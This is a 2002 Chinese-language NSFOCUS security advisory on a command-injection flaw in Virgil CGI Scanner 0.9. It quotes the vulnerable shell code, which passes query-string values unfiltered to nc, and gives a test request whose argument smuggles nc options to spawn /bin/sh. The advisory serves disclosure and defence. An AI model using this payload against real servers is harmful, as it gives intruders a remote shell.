首页 -> 安全研究

安全研究

安全漏洞
Virgil CGI扫描器远程任意命令执行漏洞

发布日期:2002-10-21
更新日期:2002-10-24

受影响系统:
Virgil CGI Scanner 0.9
描述:
Virgil CGI漏洞扫描器是由Mark Ruef开发的基于WEB在线CGI漏洞扫描程序。

Virgil CGI漏洞扫描器对用户提供的输入缺少正确的过滤,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。

问题存在于CGI扫描器中的BANNER扫描中:

BANNER=`echo -e "HEAD / HTTP/1.0\n\n" |nc -w 10 $TARGET $ZIELPORT`

其中$TARGET $ZIELPORT变量都由用户提供:

TARGET=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $1}' |sed s/"tar="//`
ZIELPORT=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $2}' |sed s/"zielport="// |sed "s/-//g"`

程序没有对用户提供的数据进行充分过滤,也就是说:

-$QUERY_STRING没有解析,如%20没有使用' '代替。
-在$ZIELPORT中('-')没有进行过滤,可追加任意命令执行。

<*来源:kalif
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103531735821918&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

kalif 提供了如下测试方法:

'/cgi-bin/virgil.cgi?tar=-le/bin/sh'

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时使用访问控制进行限制,只允许可信用户访问。

厂商补丁:

Virgil
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.computec.ch

浏览次数:3286
严重程度:16(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障